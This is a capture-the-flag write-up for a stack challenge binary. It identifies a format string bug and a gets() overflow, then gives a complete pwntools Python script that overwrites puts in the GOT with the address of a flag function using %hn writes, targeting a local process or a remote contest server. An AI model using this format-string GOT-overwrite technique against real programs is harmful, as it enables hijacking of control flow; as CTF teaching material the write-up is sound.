Description
This challenge wasn’t suppose to be solved like this when I was discussing it with the author. To check out the intentional way, check out Finches in PIE. It is similar to this one except, PIE is enabled.
Files
flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)
Enumuration
When you run the program, it will ask you for two inputs. And it talks about canary. I am guessing that you have to leak the canary and over ride the ret with the first input. Then fix the overwritten canary with the leaked canary.
Static Analysis
There is handy function called flag that prints out the flag
In say_hi(), we can see that the first_input can be used for format string vuln.
Second input also uses gets() so we can use it for BoF.
Solution
Looking at this problem, you can just use format string exploit to write to puts.got since after printf(&first_input) it will run puts and since we don’t return, we can go to flag function.
#!/usr/bin/python2.7
from pwn import *
isLocal = True
if isLocal:
p = process("./fias")
else:
p = remote("95.216.233.106", 34995)
elf = ELF("./fias")
GOT_PUTS = elf.got['puts'] # 0x804c01c
FUNC_FLAG = elf.sym['flag'] # 0x080491d2
p.recvline()
p.recvline()
#Flag addr 0x080491d2
p.sendline(p32(GOT_PUTS+2) + '@@@@' + p32(GOT_PUTS) + '%.8x' * 4 + '%.2008x%hn' + '%.35278x%hn')
p.recvline()
p.recvline()
p.recvline()
print(p.recvline())
